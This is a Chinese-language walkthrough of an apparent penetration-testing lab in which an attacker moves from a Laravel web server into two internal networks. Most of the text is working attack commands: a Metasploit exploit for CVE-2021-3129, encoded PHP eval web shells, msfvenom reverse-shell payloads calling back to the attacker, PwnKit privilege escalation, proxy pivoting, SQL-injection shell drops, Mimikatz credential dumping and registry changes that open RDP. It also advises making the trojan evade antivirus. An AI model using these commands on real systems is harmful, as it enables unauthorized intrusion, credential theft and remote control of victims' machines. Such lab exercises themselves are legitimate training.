下载地址:
链接:夸克网盘分享
提取码:C2vL

事前准备
**kali:**192.168.5.104
ubuntu20:
IP:192.168.5.108
账号/密码:root/root#qwe
IP要修改成跟自己同一网段内的
vim /etc/netplan/00-installer-config.yaml

修改完成之后输入命令保存 netplan apply
查看是否保存成功 ip a
确保可以相互ping通即可
win2016密码:Admin#123
边界机web打点
访问IP:192.168.5.108

发现为Laravel框架,直接利用msf工具
msfconsole
search CVE-2021-3129
use 0
然后设置一下远程攻击目标的IP和本地的IP,然后开始攻击
run

写入shell
echo "PD9waHAgQGV2YWwoJF9QT1NUWydwYXNzJ10pOz8+"|base64 -d >shell.php

蚁剑连接

然后是linux系统,所以要生成一个linux木马
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.5.104 LPORT=5566 -f elf -o muma.elf
msf开启监听
use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set lhost 192.168.5.104
set lport 5566
run
然后在蚁剑里面运行木马
chmod +x muma.elf
./muma.elf

ctrl+z保存到后台
然后利用msf进行提权,利用msf自带的模块
use exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec
set SESSION 3
# 强制指定64位payload
set payload linux/x64/meterpreter/reverse_tcp
run

内网渗透-win2016
信息收集
发现有双网卡

设置路由和代理
use post/multi/manage/autoroute
set SESSION 4
run autoroute -p
use auxiliary/server/socks_proxy
set VERSION 5
set SRVHOST 0.0.0.0
set SRVPORT 1080
run -j
使用auxiliary/scanner/portscan/tcp模块进行主机存活扫描
use auxiliary/scanner/portscan/tcp
set RHOSTS 10.0.20.0/24
set PORTS 21,22,80,135,139,445,3389,6379,8080,8443
set THREADS 12
run

web渗透
然后火狐挂代理进行访问http://10.0.20.100/

来到Admin Login界面,进行爆破或者弱口令尝试
admin/admin123
http://10.0.20.100/admin/inquiries/view_details.php?id=1观察发现这里存在sql注入
先拿sqlmap进行确认

然后尝试拿shell

然后写入一句话木马
echo ^<^?php @$a = $_REQUEST['d'];$b='';eval($b.$a);?^> > test.php
然后蚁剑设置代理进行连接


可以执行命令

需要端口转发
# -l 1122 = 跳板对外端口(木马连接)
# -p 7777 = 转发到Kali的7777端口
portfwd add -R -l 7777 -p 1122 -L 0.0.0.0
上线msf
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.0.20.141 LPORT=1122 -f exe -o rev.exe
注意此处的木马要做免杀

msf开启监听,这里的msf需要新开一个
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 0.0.0.0
set LPORT 7777
run

ipconfig查看内网信息发现还有10.0.10.0/24网段

添加路由
run post/multi/manage/autoroute

内网渗透-ubuntu16
信息收集
use auxiliary/scanner/portscan/tcp
set ports 22,23,80,443,8080,445,3306,6378,113,114,81,8000
set threads 30
set RHOSTS 10.0.10.0/24
run

先提权然后再抓取win2016密码
getsystem
load kiwi
creds_all

解密

密码为Admin#123
开启远程桌面并且连接
shell reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /t REG_DWORD /v portnumber /d 3389 /f
execute -f cmd.exe -a '/c reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /t REG_DWORD /v portnumber /d 3389 /f'
execute -f cmd.exe -a '/c netsh advfirewall firewall set rule group="remote desktop" new enable=yes'
proxychains4 rdesktop -u Administrator -p Admin#123 10.0.10.110

发现存在远程连接工具,输入本机密码发现登录成功
发现存在10.0.10.110机器,与之前扫描发现的内网主机一致。